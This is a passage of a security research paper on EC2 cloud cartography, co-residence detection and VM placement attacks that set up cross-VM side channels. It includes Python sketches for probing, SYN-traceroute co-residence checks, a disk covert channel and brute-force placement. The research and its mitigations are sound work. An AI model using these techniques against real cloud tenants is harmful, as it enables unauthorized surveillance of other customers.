Hey, You, Get Off of My Cloud: Exploring Information Leakage in Third-Party Compute Clouds


Thomas Ristenpart*        Eran Tromer†        Hovav Shacham*        Stefan Savage*

* Dept. of Computer Science and Engineering, University of California, San Diego, USA
  {tristenp,hovav,savage}@cs.ucsd.edu
† Computer Science and Artificial Intelligence Laboratory, Massachusetts Institute of Technology, Cambridge, USA
  tromer@csail.mit.edu

ABSTRACT

Third-party cloud computing represents the promise of outsourcing as applied to computation. Services, such as Microsoft's Azure and Amazon's EC2, allow users to instantiate virtual machines (VMs) on demand and thus purchase precisely the capacity they require when they require it. In turn, the use of virtualization allows third-party cloud providers to maximize the utilization of their sunk capital costs by multiplexing many customer VMs across a shared physical infrastructure. However, in this paper, we show that this approach can also introduce new vulnerabilities. Using the Amazon EC2 service as a case study, we show that it is possible to map the internal cloud infrastructure, identify where a particular target VM is likely to reside, and then instantiate new VMs until one is placed co-resident with the target. We explore how such placement can then be used to mount cross-VM side-channel attacks to extract information from a target VM on the same machine.

Categories and Subject Descriptors

K.6.5 [Security and Protection]: UNAUTHORIZED ACCESS

General Terms

Security, Measurement, Experimentation

Keywords

Cloud computing, Virtual machine security, Side channels

1. INTRODUCTION

It has become increasingly popular to talk of "cloud computing" as the next infrastructure for hosting data and deploying software and services. In addition to the plethora of technical approaches associated with the term, cloud computing is also used to refer to a new business model in which core computing and software capabilities are outsourced on demand to shared third-party infrastructure. While this model, exemplified by Amazon's Elastic Compute Cloud (EC2) [5], Microsoft's Azure Service Platform [20], and Rackspace's Mosso [27], provides a number of advantages, including economies of scale, dynamic provisioning, and low capital expenditures, it also introduces a range of new risks.

Some of these risks are self-evident and relate to the new trust relationship between customer and cloud provider. For example, customers must trust their cloud providers to respect the privacy of their data and the integrity of their computations. However, cloud infrastructures can also introduce non-obvious threats from other customers due to the subtleties of how physical resources can be transparently shared between virtual machines (VMs).

In particular, to maximize efficiency multiple VMs may be simultaneously assigned to execute on the same physical server. Moreover, many cloud providers allow "multi-tenancy": multiplexing the virtual machines of disjoint customers upon the same physical hardware. Thus it is conceivable that a customer's VM could be assigned to the same physical server as their adversary. This, in turn, engenders a new threat: the adversary might penetrate the isolation between VMs (e.g., via a vulnerability that allows an "escape" to the hypervisor or via side-channels between VMs) and violate customer confidentiality. This paper explores the practicality of mounting such cross-VM attacks in existing third-party compute clouds.

The attacks we consider require two main steps: placement and extraction. Placement refers to the adversary arranging to place their malicious VM on the same physical machine as that of a target customer. Using Amazon's EC2 as a case study, we demonstrate that careful empirical "mapping" can reveal how to launch VMs in a way that maximizes the likelihood of an advantageous placement. We find that in some natural attack scenarios, just a few dollars invested in launching VMs can produce a 40% chance of placing a malicious VM on the same physical server as a target customer. Using the same platform we also demonstrate the existence of simple, low-overhead "co-residence" checks to determine when such an advantageous placement has taken place. While we focus on EC2, we believe that variants of our techniques are likely to generalize to other services, such as Microsoft's Azure [20] or Rackspace's Mosso [27], as we only utilize standard customer capabilities and do not require that cloud providers disclose details of their infrastructure or assignment policies.
Having managed to place a VM co-resident with the target, the next step is to extract confidential information via a cross-VM attack. While there are a number of avenues for such an attack, in this paper we focus on side-channels: cross-VM information leakage due to the sharing of physical resources (e.g., the CPU's data caches). In the multi-process environment, such attacks have been shown to enable extraction of RSA [26] and AES [22] secret keys. However, we are unaware of published extensions of these attacks to the virtual machine environment; indeed, there are significant practical challenges in doing so.

We show preliminary results on cross-VM side-channel attacks, including a range of building blocks (e.g., cache load measurements in EC2) and coarse-grained attacks such as measuring activity burst timing (e.g., for cross-VM keystroke monitoring). These point to the practicality of side-channel attacks in cloud-computing environments.

Overall, our results indicate that there exist tangible dangers when deploying sensitive tasks to third-party compute clouds. In the remainder of this paper, we explain these findings in more detail and then discuss means to mitigate the problem. We argue that the best solution is for cloud providers to expose this risk explicitly and give some placement control directly to customers.

2. THREAT MODEL

As more and more applications become exported to third-party compute clouds, it becomes increasingly important to quantify any threats to confidentiality that exist in this setting. For example, cloud computing services are already used for e-commerce applications, medical record services [7, 11], and back-office business applications [29], all of which require strong confidentiality guarantees. An obvious threat to these consumers of cloud computing is malicious behavior by the cloud provider, who is certainly in a position to violate customer confidentiality or integrity. However, this is a known risk with obvious analogs in virtually any industry practicing outsourcing. In this work, we consider the provider and its infrastructure to be trusted. This also means we do not consider attacks that rely upon subverting a cloud's administrative functions, via insider abuse or vulnerabilities in the cloud management systems (e.g., virtual machine monitors).

In our threat model, adversaries are non-provider-affiliated malicious parties. Victims are users running confidentiality-requiring services in the cloud. A traditional threat in such a setting is direct compromise, where an attacker attempts remote exploitation of vulnerabilities in the software running on the system. Of course, this threat exists for cloud applications as well. These kinds of attacks (while important) are a known threat and the risks they present are understood.

We instead focus on where third-party cloud computing gives attackers novel abilities, implicitly expanding the attack surface of the victim. We assume that, like any customer, a malicious party can run and control many instances in the cloud, simply by contracting for them. Further, since the economies offered by third-party compute clouds derive from multiplexing physical infrastructure, we assume (and later validate) that an attacker's instances might even run on the same physical hardware as potential victims. From this vantage, an attacker might manipulate shared physical resources (e.g., CPU caches, branch target buffers, network queues, etc.) to learn otherwise confidential information.

In this setting, we consider two kinds of attackers: those who cast a wide net and are interested in being able to attack some known hosted service, and those focused on attacking a particular victim service. The latter's task is more expensive and time-consuming than the former's, but both rely on the same fundamental attack.

In this work, we initiate a rigorous research program aimed at exploring the risk of such attacks, using a concrete cloud service provider (Amazon EC2) as a case study. We address these concrete questions in subsequent sections:

• Can one determine where in the cloud infrastructure an instance is located? (Section 5)

• Can one easily determine if two instances are co-resident on the same physical machine? (Section 6)

• Can an adversary launch instances that will be co-resident with other users' instances? (Section 7)

• Can an adversary exploit cross-VM information leakage once co-resident? (Section 8)

Throughout we offer discussions of defenses a cloud provider might try in order to prevent the success of the various attack steps.

3. THE EC2 SERVICE

By far the best known example of a third-party compute cloud is Amazon's Elastic Compute Cloud (EC2) service, which enables users to flexibly rent computational resources for use by their applications [5]. EC2 provides the ability to run Linux, FreeBSD, OpenSolaris and Windows as guest operating systems within a virtual machine (VM) provided by a version of the Xen hypervisor [9].[1] The hypervisor plays the role of a virtual machine monitor and provides isolation between VMs, intermediating access to physical memory and devices. A privileged virtual machine, called Domain0 (Dom0) in the Xen vernacular, is used to manage guest images, their physical resource provisioning, and any access control rights. In EC2 the Dom0 VM is configured to route packets for its guest images and reports itself as a hop in traceroutes.

[1] We will limit our subsequent discussion to the Linux kernel. The same issues should apply for other guest operating systems.

When first registering with EC2, each user creates an account, uniquely specified by its contact e-mail address, and provides credit card information for billing compute and I/O charges. With a valid account, a user creates one or more VM images, based on a supplied Xen-compatible kernel, but with an otherwise arbitrary configuration. He can run one or more copies of these images on Amazon's network of machines. One such running image is called an instance, and when the instance is launched, it is assigned to a single physical machine within the EC2 network for its lifetime; EC2 does not appear to currently support live migration of instances, although this should be technically feasible. By default, each user account is limited to 20 concurrently running instances.

In addition, there are three degrees of freedom in specifying the physical infrastructure upon which instances should run. At the time of this writing, Amazon provides two "regions", one located in the United States and the more recently established one in Europe. Each region contains three "availability zones" which are meant to specify infrastructures with distinct and independent failure modes
(e.g., with separate power and network connectivity). When requesting launch of an instance, a user specifies the region and may choose a specific availability zone (otherwise one is assigned on the user's behalf). As well, the user can specify an "instance type", indicating a particular combination of computational power, memory and persistent storage space available to the virtual machine. There are five Linux instance types documented at present, referred to as 'm1.small', 'c1.medium', 'm1.large', 'm1.xlarge', and 'c1.xlarge'. The first two are 32-bit architectures, the latter three are 64-bit. To give some sense of relative scale, the "small compute slot" (m1.small) is described as a single virtual core providing one ECU (EC2 Compute Unit, claimed to be equivalent to a 1.0–1.2 GHz 2007 Opteron or 2007 Xeon processor) combined with 1.7 GB of memory and 160 GB of local storage, while the "large compute slot" (m1.large) provides 2 virtual cores each with 2 ECUs, 7.5 GB of memory and 850 GB of local storage. As expected, instances with more resources incur greater hourly charges (e.g., 'm1.small' in the United States region is currently $0.10 per hour, while 'm1.large' is currently $0.40 per hour). When launching an instance, the user specifies the instance type along with a compatible virtual machine image.

Given these constraints, virtual machines are placed on available physical servers shared among multiple instances. Each instance is given Internet connectivity via both an external IPv4 address and domain name and an internal RFC 1918 private address and domain name. For example, an instance might be assigned external IP 75.101.210.100, external name ec2-75-101-210-100.compute-1.amazonaws.com, internal IP 10.252.146.52, and internal name domU-12-31-38-00-8D-C6.compute-1.internal. Within the cloud, both domain names resolve to the internal IP address; outside the cloud the external name is mapped to the external IP address.

Note that we focus on the United States region; in the rest of the paper EC2 implicitly means this region of EC2.

4. NETWORK PROBING

In the next several sections, we describe an empirical measurement study focused on understanding VM placement in the EC2 system and achieving co-resident placement for an adversary. To do this, we make use of network probing both to identify public services hosted on EC2 and to provide evidence of co-residence (that two instances share the same physical server). In particular, we utilize nmap, hping, and wget to perform network probes to determine liveness of EC2 instances. We use nmap to perform TCP connect probes, which attempt to complete a 3-way handshake between a source and target. We use hping to perform TCP SYN traceroutes, which iteratively send TCP SYN packets with increasing time-to-lives (TTLs) until no ACK is received. Both TCP connect probes and SYN traceroutes require a target port; we only targeted ports 80 or 443. We used wget to retrieve web pages, but capped retrieval so that at most 1024 bytes are fetched from any individual web server.

We distinguish between two types of probes: external probes and internal probes. A probe is external when it originates from a system outside EC2 and has as its destination an EC2 instance. A probe is internal if it originates from an EC2 instance (under our control) and has as its destination another EC2 instance. This dichotomy is of relevance particularly because internal probing is subject to Amazon's acceptable use policy, whereas external probing is not (we discuss the legal, ethical and contractual issues around such probing in Appendix A).

We use DNS resolution queries to determine the external name of an instance and also to determine the internal IP address of an instance associated with some public IP address. The latter queries are always performed from an EC2 instance.

5. CLOUD CARTOGRAPHY

In this section we 'map' the EC2 service to understand where potential targets are located in the cloud and which instance creation parameters are needed to attempt establishing co-residence of an adversarial instance. This significantly speeds up adversarial strategies for placing a malicious VM on the same machine as a target. In the next section we will treat the task of confirming when successful co-residence is achieved.

To map EC2, we begin with the hypothesis that different availability zones are likely to correspond to different internal IP address ranges, and the same may be true for instance types as well. Thus, mapping the use of the EC2 internal address space allows an adversary to determine which IP addresses correspond to which creation parameters. Moreover, since EC2's DNS service provides a means to map a public IP address to its private IP address, an adversary might use such a map to infer the instance type and availability zone of a target service, thereby dramatically reducing the number of instances needed before a co-resident placement is achieved.

We evaluate this theory using two data sets: one created by enumerating public EC2-based web servers using external probes and translating responsive public IPs to internal IPs (via DNS queries within the cloud), and another created by launching a number of EC2 instances of varying types and surveying the resulting IP addresses assigned.

To fully leverage the latter data, we present a heuristic algorithm that helps label /24 prefixes with an estimate of the availability zone and instance type of the included internal IPs. These heuristics utilize several beneficial features of EC2's addressing regime. The output of this process is a map of the internal EC2 address space which allows one to estimate the availability zone and instance type of any target public EC2 server. Next, we enumerate a set of public EC2-based web servers.

Surveying public servers on EC2. Utilizing WHOIS queries, we identified four distinct IP address prefixes, a /16, /17, /18, and /19, as being associated with EC2. The last three contained public IPs observed as assigned to EC2 instances. We had not yet observed EC2 instances with public IPs in the /16, and therefore did not include it in our survey. For the remaining IP addresses (57 344 IP addresses), we performed a TCP connect probe on port 80. This resulted in 11 315 responsive IPs. Of these, 9 558 responded (with some HTTP response) to a follow-up wget on port 80. We also performed a TCP port 443 scan of all 57 344 IP addresses, which resulted in 8 375 responsive IPs. Via an appropriate DNS lookup from within EC2, we translated each public IP address that responded to either the port 80 or port 443 scan into an internal EC2 address. This resulted in a list of 14 054 unique internal IPs. One of the goals of this section is to enable identification of the instance type and availability zone of one or more of these potential targets.
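For concreteness, the short sketch below shows one way such probes and translations could be implemented. It is illustrative only: the study itself used nmap, hping and wget, a plain TCP connect stands in for those tools here, and the translation step assumes (as in the example of Section 3) that reverse DNS on a public EC2 IP returns the instance's public DNS name and that the forward resolution is performed from inside EC2.

    import socket

    def tcp_connect_probe(host, port=80, timeout=3.0):
        """External liveness probe: try to complete a TCP handshake (stand-in for nmap)."""
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            return False

    def public_to_internal(public_ip):
        """Translate a responsive public EC2 IP to its internal address.

        Reverse DNS on the public IP is assumed to yield a name of the form
        ec2-A-B-C-D.compute-1.amazonaws.com; resolving that name from inside
        EC2 returns the RFC 1918 internal address (outside EC2 it returns the
        public one), so this function must run on an EC2 instance."""
        name, _, _ = socket.gethostbyaddr(public_ip)   # e.g. ec2-75-101-210-100.compute-1.amazonaws.com
        return socket.gethostbyname(name)              # internal IP when resolved within the cloud

    if __name__ == "__main__":
        target = "75.101.210.100"                      # example public IP from Section 3
        if tcp_connect_probe(target, 80) or tcp_connect_probe(target, 443):
            print(target, "->", public_to_internal(target))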
[Figure 1 appears here: two scatter plots of internal IP address (x-axis, spanning 10.249.0.0 through 10.255.0.0) versus IP address mod 64 (y-axis). The top plot is partitioned by availability zone (Zones 1–3); the bottom plot shows Zone 3 instances by account (Accounts A and B) and by instance type (m1.small, c1.medium, m1.large, m1.xlarge, c1.xlarge).]

Figure 1: (Top) A plot of the internal IP addresses assigned to instances launched during the initial mapping experiment using Account A. (Bottom) A plot of the internal IP addresses of instances launched in Zone 3 by Account A and, 39 hours later, by Account B. Fifty-five of the Account B IPs were repeats of those assigned to instances for Account A.

Instance placement parameters. Recall that there are three availability zones and five instance types in the present EC2 system. While these parameters could be assigned independently from the underlying infrastructure, in practice this is not so. In particular, the Amazon EC2 internal IP address space is cleanly partitioned between availability zones (likely to make it easy to manage separate network connectivity for these zones), and instance types within these zones also show considerable regularity. Moreover, different accounts exhibit similar placement.

To establish these facts, we iteratively launched 20 instances for each of the 15 availability zone/instance type pairs. We used a single account, call it "Account A". The top graph in Figure 1 depicts a plot of the internal IP address assigned to each of the 300 instances, partitioned according to availability zone. It can be readily seen that the samples from each zone are assigned IP addresses from disjoint portions of the observed internal address space. For example, samples from Zone 3 were assigned addresses within 10.252.0.0/16 and from discrete prefixes within 10.253.0.0/16. If we make the assumption that internal IP addresses are statically assigned to physical machines (doing otherwise would make IP routing far more difficult to implement), this data supports the assessment that availability zones use separate physical infrastructure. Indeed, none of the data gathered in the rest of the paper's described experiments has cast doubt on this conclusion.

While it is perhaps not surprising that availability zones enjoy disjoint IP assignment, what about instance type and accounts? We launched 100 instances (20 of each type, 39 hours after terminating the Account A instances) in Zone 3 from a second account, "Account B". The bottom graph in Figure 1 plots the Zone 3 instances from Account A and Account B, here using distinct labels for instance type. Of the 100 Account A Zone 3 instances, 92 had unique /24 prefixes, while eight /24 prefixes each had two instances, though of the same type. Of the 100 Account B instances, 88 had unique /24 prefixes, while six of the /24 prefixes had two instances each. A single /24 had both an m1.large and an m1.xlarge instance. No IP addresses were ever observed being assigned to more than one instance type. Of the 100 Account B IPs, 55 were repeats of IP addresses assigned to instances for Account A.

A fuller map of EC2. We would like to infer the instance type and availability zone of any public EC2 instance, but our sampling data is relatively sparse. We could sample more (and did), but to take full advantage of the sampling data at hand we should take advantage of the significant regularity of the EC2 addressing regime. For example, the above data suggests that /24 prefixes rarely have IPs assigned to distinct instance types. We utilized data from 4 499 instances launched under several accounts under our control; these instances were also used in many of the experiments described in the rest of the paper. These included 977 unique internal IPs and 611 unique Dom0 IPs associated with these instances.

Using manual inspection of the resultant data, we derived a set of heuristics to label /24 prefixes with both availability zone and instance type (a sketch of the resulting labeling procedure appears below):

• All IPs from a /16 are from the same availability zone.

• A /24 inherits any included sampled instance type. If there are multiple instances with distinct types, then we label the /24 with each distinct type (i.e., it is ambiguous).

• A /24 containing a Dom0 IP address only contains Dom0 IP addresses. We associate to this /24 the type of the Dom0's associated instance.

• All /24's between two consecutive Dom0 /24's inherit the former's associated type.

The last heuristic, which enables us to label /24's that have no included instance, is derived from the observation that Dom0 IPs are consistently assigned a prefix that immediately precedes the instance IPs they are associated with.
(For example, 10.254.8.0/24 contained Dom0 IPs associated with m1.small instances in prefixes 10.254.9.0/24 and 10.254.10.0/24.) There were 869 /24's in the data, and applying the heuristics resulted in assigning a unique zone and unique type to 723 of these; a unique zone and two types to 23 of these; and left 123 unlabeled. These last were due to areas (such as the lower portion of 10.253.0.0/16) for which we had no sampling data at all.
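The labeling pass itself is mechanical. The sketch below is one possible rendering of the four heuristics; the input format (tuples of internal IP, zone and type for sampled instances, and of Dom0 IP and associated type) is our assumption for illustration and not a format used in the measurement study.

    import ipaddress
    from collections import defaultdict

    def net24(ip):
        # the /24 prefix containing ip, e.g. '10.254.9.17' -> 10.254.9.0/24
        return ipaddress.ip_network(ip + "/24", strict=False)

    def label_prefixes(instance_samples, dom0_samples):
        """instance_samples: iterable of (internal_ip, zone, instance_type)
           dom0_samples:     iterable of (dom0_ip, instance_type)
           Returns {/24 network: (zone or None, set of candidate instance types)}."""
        zone_of_16 = {}                    # heuristic 1: /16 -> availability zone
        sampled_types = defaultdict(set)   # heuristic 2: /24 -> types seen in samples
        dom0_type = {}                     # heuristic 3: Dom0 /24 -> associated type

        for ip, zone, itype in instance_samples:
            zone_of_16[ipaddress.ip_network(ip + "/16", strict=False)] = zone
            sampled_types[net24(ip)].add(itype)
        for ip, itype in dom0_samples:
            dom0_type[net24(ip)] = itype

        # Heuristic 4: every /24 lying between two consecutive Dom0 /24s
        # inherits the earlier Dom0's associated type.
        dom0_nets = sorted(dom0_type, key=lambda n: n.network_address)
        inherited = {}
        for lo, hi in zip(dom0_nets, dom0_nets[1:]):
            step = ipaddress.ip_network((int(lo.network_address) + 256, 24))
            while step.network_address < hi.network_address:
                inherited[step] = dom0_type[lo]
                step = ipaddress.ip_network((int(step.network_address) + 256, 24))

        labeled = {}
        for net in set(sampled_types) | set(inherited) | set(dom0_type):
            types = set(sampled_types.get(net, set()))
            if not types and net in inherited:
                types = {inherited[net]}
            if net in dom0_type:
                types = {dom0_type[net]}      # Dom0 /24s carry their instance's type
            sixteen = ipaddress.ip_network((int(net.network_address) & 0xFFFF0000, 16))
            labeled[net] = (zone_of_16.get(sixteen), types)
        return labeled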
While the map might contain errors (for example, in areas of low instance sample numbers), we have yet to encounter an instance that contradicts the /24 labeling, and we used the map for many of the later experiments. For instance, we applied it to a subset of the public servers derived from our survey, those that responded to wget requests with an HTTP 200 or 206. The resulting 6 057 servers were used as stand-ins for targets in some of the experiments in Section 7. Figure 7 in the appendix graphs the result of mapping these servers.

Preventing cloud cartography. Providers likely have incentive to prevent cloud cartography for several reasons, beyond the use we outline here (that of exploiting placement vulnerabilities). Namely, they might wish to hide their infrastructure and the amount of use it is enjoying by customers. Several features of EC2 made cartography significantly easier. Paramount is that local IP addresses are statically (at least over the observed period of time) associated to availability zone and instance type. Changing this would likely make administration tasks more challenging (and costly) for providers. Also, using the map requires translating a victim instance's external IP to an internal IP, and the provider might inhibit this by isolating each account's view of the internal IP address space (e.g. via VLANs and bridging). Even so, this would only appear to slow down our particular technique for locating an instance in the LAN; one might instead use ping timing measurements or traceroutes (both discussed more in the next section) to help "triangulate" on a victim.

6. DETERMINING CO-RESIDENCE

Given a set of targets, the EC2 map from the previous section educates the choice of instance launch parameters for attempting to achieve placement on the same physical machine. Recall that we refer to instances that are running on the same physical machine as being co-resident. In this section we describe several easy-to-implement co-residence checks. Looking ahead, our eventual check of choice will be to compare instances' Dom0 IP addresses. We confirm the accuracy of this (and other) co-residence checks by exploiting a hard-disk-based covert channel between EC2 instances.

Network-based co-residence checks. Using our experience running instances while mapping EC2 and inspecting data collected about them, we identify several potential methods for checking if two instances are co-resident. Namely, instances are likely co-resident if they have

(1) matching Dom0 IP address,

(2) small packet round-trip times, or

(3) numerically close internal IP addresses (e.g. within 7).

As mentioned, an instance's network traffic's first hop is the Dom0 privileged VM. An instance owner can determine its Dom0 IP from the first hop on any route out from the instance. One can determine an uncontrolled instance's Dom0 IP by performing a TCP SYN traceroute to it (on some open port) from another instance and inspecting the last hop. For the second test, we noticed that round-trip times (RTTs) required a "warm-up": the first reported RTT in any sequence of probes was almost always an order of magnitude slower than subsequent probes. Thus for this method we perform 10 probes and just discard the first. The third check makes use of the manner in which internal IP addresses appear to be assigned by EC2. The same Dom0 IP will be shared by instances with a contiguous sequence of internal IP addresses. (Note that m1.small instances are reported by CPUID as having two CPUs, each with two cores, and these EC2 instance types are limited to 50% core usage, implying that one such machine could handle eight instances.)

Veracity of the co-residence checks. We verify the correctness of our network-based co-residence checks using as ground truth the ability to send messages over a cross-VM covert channel. That is, if two instances (under our control) can successfully transmit via the covert channel then they are co-resident, otherwise not. If the checks above (which do not require both instances to be under our control) have sufficiently low false positive rates relative to this check, then we can use them for inferring co-residence against arbitrary victims. We utilized for this experiment a hard-disk-based covert channel. At a very high level, the channel works as follows. To send a one bit, the sender instance reads from random locations on a shared disk volume. To send a zero bit, the sender does nothing. The receiver times reading from a fixed location on the disk volume. Longer read times mean a 1 is being sent; shorter read times give a 0.
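To make the channel concrete, the sketch below shows the timing idea for a sender and a receiver. The device path, bit period, threshold and region size are illustrative assumptions; the study does not specify its parameters, and a real implementation would additionally need to bypass the OS page cache (e.g., via O_DIRECT), agree with the sender on a start time, and add error coding (the experiments below send only 5-bit messages).

    import random, time

    DEVICE = "/dev/sdb"        # hypothetical shared disk volume (requires root; assumption)
    BIT_PERIOD = 0.5           # seconds per transmitted bit (assumption)
    BLOCK = 4096
    REGION = 8 * 2**30         # size of the region the sender seeks within (assumption)

    def send_bits(bits):
        """Sender: to signal a 1, issue random reads for one bit period; for a 0, idle."""
        with open(DEVICE, "rb", buffering=0) as disk:
            for b in bits:
                deadline = time.time() + BIT_PERIOD
                while time.time() < deadline:
                    if b == 1:
                        disk.seek(random.randrange(0, REGION, BLOCK))
                        disk.read(BLOCK)
                    else:
                        time.sleep(0.01)

    def recv_bits(n, threshold):
        """Receiver: repeatedly time reads of a fixed block; slow periods decode as 1.
        NB: the page cache must be bypassed in practice so timings reflect the shared disk."""
        out = []
        with open(DEVICE, "rb", buffering=0) as disk:
            for _ in range(n):
                start, reads = time.time(), 0
                while time.time() - start < BIT_PERIOD:
                    disk.seek(0)
                    disk.read(BLOCK)
                    reads += 1
                mean_read_time = BIT_PERIOD / max(reads, 1)
                out.append(1 if mean_read_time > threshold else 0)
        return out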
We performed the following experiment. Three EC2 accounts were utilized: a control, a victim, and a probe. (The "victim" and "probe" are arbitrary labels, since they were both under our control.) All instances launched were of type m1.small. Two instances were launched by the control account in each of the three availability zones. Then 20 instances on the victim account and 20 instances on the probe account were launched, all in Zone 3. We determined the Dom0 IPs of each instance. For each (ordered) pair (A, B) of these 40 instances, if the Dom0 IPs passed (check 1), then we had A probe B and each control to determine packet RTTs, and we also sent a 5-bit message from A to B over the hard-drive covert channel.

We performed three independent trials. These generated, in total, 31 pairs of instances for which the Dom0 IPs were equal. The internal IP addresses of each pair were within 7 of each other. Of the 31 (potentially) co-resident instance pairs, 12 were 'repeats' (a pair from a later round had the same Dom0 as a pair from an earlier round).

The 31 pairs give 62 ordered pairs. The hard-drive covert channel successfully sent a 5-bit message for 60 of these pairs. The last two failed due to a single bit error each, and we point out that these two failures were not for the same pair of instances (i.e. sending a message in the reverse direction succeeded). The results of the RTT probes are shown in Figure 2. The median RTT for co-resident instances was significantly smaller than those to any of the controls. The RTTs to the controls in the same availability zone as the probe (Zone 3) and victim instances were also noticeably smaller than those to other zones.

                             Count   Median RTT (ms)
    Co-resident instance      62         0.242
    Zone 1 Control A          62         1.164
    Zone 1 Control B          62         1.027
    Zone 2 Control A          61         1.113
    Zone 2 Control B          62         1.187
    Zone 3 Control A          62         0.550
    Zone 3 Control B          62         0.436

Figure 2: Median round-trip times in milliseconds for probes sent during the 62 co-residence checks. (A probe to Zone 2 Control A timed out.)

Discussion. From this experiment we conclude an effective false positive rate of zero for the Dom0 IP co-residence check. In the rest of the paper we will therefore utilize the
following when checking for co-residence of an instance with a target instance we do not control. First one compares the internal IP addresses of the two instances, to see if they are numerically close. (For m1.small instances, close is within seven.) If this is the case, the instance performs a TCP SYN traceroute to an open port on the target, and sees if there is only a single hop, that being the Dom0 IP. (This instantiates the Dom0 IP equivalence check.) Note that this check requires sending (at most) two TCP SYN packets and is therefore very "quiet".
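The check is small enough to spell out. The sketch below uses Scapy purely for illustration (the study used hping); the helper names are ours, the probing instance is assumed to already know its own internal and Dom0 IPs from its outbound route, and the closeness window of 7 is the m1.small value given above.

    import ipaddress
    from scapy.all import IP, TCP, ICMP, sr1   # sending raw packets requires root

    def numerically_close(ip_a, ip_b, window=7):
        """Check (3): internal IP addresses within `window` of one another."""
        return abs(int(ipaddress.IPv4Address(ip_a)) -
                   int(ipaddress.IPv4Address(ip_b))) <= window

    def first_hop(target_ip, port=80, ttl=1, timeout=2):
        """Send one TCP SYN with the given TTL and report who answered:
        an ICMP time-exceeded reply names an intermediate hop, while a TCP
        reply means the target itself was reached within `ttl` hops."""
        reply = sr1(IP(dst=target_ip, ttl=ttl) / TCP(dport=port, flags="S"),
                    timeout=timeout, verbose=0)
        if reply is None:
            return None, None
        if reply.haslayer(ICMP) and reply[ICMP].type == 11:
            return "hop", reply.src
        if reply.haslayer(TCP):
            return "target", reply.src
        return None, reply.src

    def quiet_coresidence_check(my_internal_ip, my_dom0_ip, target_internal_ip, port=80):
        """Two-packet check: internal IPs are close, the single intermediate hop
        is our own Dom0, and the target answers at TTL 2."""
        if not numerically_close(my_internal_ip, target_internal_ip):
            return False
        kind1, addr1 = first_hop(target_internal_ip, port, ttl=1)
        kind2, _ = first_hop(target_internal_ip, port, ttl=2)
        return kind1 == "hop" and addr1 == my_dom0_ip and kind2 == "target"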
Obfuscating co-residence. A cloud provider could likely render the network-based co-residence checks we use moot. For example, a provider might have Dom0 not respond in traceroutes, might randomly assign internal IP addresses at the time of instance launch, and/or might use virtual LANs to isolate accounts. If such precautions are taken, attackers might need to turn to co-residence checks that do not rely on network measurements. In Section 8.1 we show experimentally that side-channels can be utilized to establish co-residence in a way completely agnostic to network configuration. Even so, inhibiting network-based co-residence checks would impede attackers to some degree, and so determining the most efficient means of obfuscating internal cloud infrastructure from adversaries is a good potential avenue for defense.

7. EXPLOITING PLACEMENT IN EC2

Consider an adversary wishing to attack one or more EC2 instances. Can the attacker arrange for an instance to be placed on the same physical machine as (one of) these victims? In this section we assess the feasibility of achieving co-residence with such target victims, saying the attacker is successful if he or she achieves good coverage (co-residence with a notable fraction of the target set). We offer two adversarial strategies that make crucial use of the map developed in Section 5 and the cheap co-residence checks we introduced in Section 6. The brute-force strategy has an attacker simply launch many instances over a relatively long period of time. Such a naive strategy already achieves reasonable success rates (though for relatively large target sets). A more refined strategy has the attacker target recently-launched instances. This takes advantage of the tendency for EC2 to assign fresh instances to the same small set of machines. Our experiments show that this feature (combined with the ability to map EC2 and perform co-residence checks) represents an exploitable placement vulnerability: measurements show that the strategy achieves co-residence with a specific (m1.small) instance almost half the time. As we discuss below, an attacker can infer when a victim instance is launched or might even trigger launching of victims, making this attack scenario practical.

Towards understanding placement. Before we describe these strategies, we first collect several observations we initially made regarding Amazon's (unknown) placement algorithms. Subsequent interactions with EC2 only reinforced these observations.

A single account was never seen to have two instances simultaneously running on the same physical machine, so running n instances in parallel under a single account results in placement on n separate machines. No more than eight m1.small instances were ever observed to be simultaneously co-resident. (This lends more evidence to support our earlier estimate that each physical machine supports a maximum of eight m1.small instances.) While a machine is full (assigned its maximum number of instances), an attacker has no chance of being assigned to it.

We observed strong placement locality. Sequential placement locality is the tendency for two instances run sequentially (the first terminated before launching the second) to be assigned to the same machine. Parallel placement locality is the tendency for two instances run (from distinct accounts) at roughly the same time to be assigned to the same machine. In our experience, launched instances exhibited both strong sequential and strong parallel locality.

Our experiences suggest a correlation between instance density (the number of instances assigned to a machine) and a machine's affinity for having a new instance assigned to it. In Appendix B we discuss an experiment that revealed a bias in placement towards machines with fewer instances already assigned. This would make sense from an operational viewpoint under the hypothesis that Amazon balances load across running machines.

We concentrate in the following on the m1.small instance type. However, we have also achieved active co-residence between two m1.large instances under our control, and have observed m1.large and c1.medium instances with co-resident commercial instances. Based on the reported (using CPUID) system configurations of the m1.xlarge and c1.xlarge instance types, we assume that these instances have machines to themselves, and indeed we never observed co-residence of multiple such instances.

7.1 Brute-forcing placement

We start by assessing an obvious attack strategy: run numerous instances over a (relatively) long period of time and see how many targets one can achieve co-residence with. While such a brute-force strategy does nothing clever (once the results of the previous sections are in place), our hypothesis is that for large target sets this strategy will already allow reasonable success rates.

The strategy works as follows. The attacker enumerates a set of potential target victims. The adversary then infers which of these targets belong to a particular availability zone and are of a particular instance type using the map from Section 5. Then, over some (relatively long) period of time the adversary repeatedly runs probe instances in the target zone and of the target type. Each probe instance checks if it is co-resident with any of the targets. If not, the instance is quickly terminated.
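The control loop behind this strategy is straightforward, as the sketch below shows. launch_probe, co_resident and terminate are hypothetical helpers: the first stands in for the provider's instance-launch interface, the second for the cheap checks of Section 6, and the third for instance termination; none of them is a real EC2 API call.

    import time

    def brute_force_placement(targets, zone, instance_type,
                              rounds, probes_per_round, pause):
        """Run waves of probe instances in the victims' zone and of the victims'
        type, keep any probe that lands next to a target, and discard the rest.
        launch_probe, co_resident and terminate are hypothetical helpers."""
        covered = set()
        for _ in range(rounds):
            probes = [launch_probe(zone, instance_type) for _ in range(probes_per_round)]
            for probe in probes:
                hits = {t for t in targets if co_resident(probe, t)}
                if hits:
                    covered |= hits      # keep this probe alive for the cross-VM phase
                else:
                    terminate(probe)     # no collision: stop paying for it
            time.sleep(pause)
        return covered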
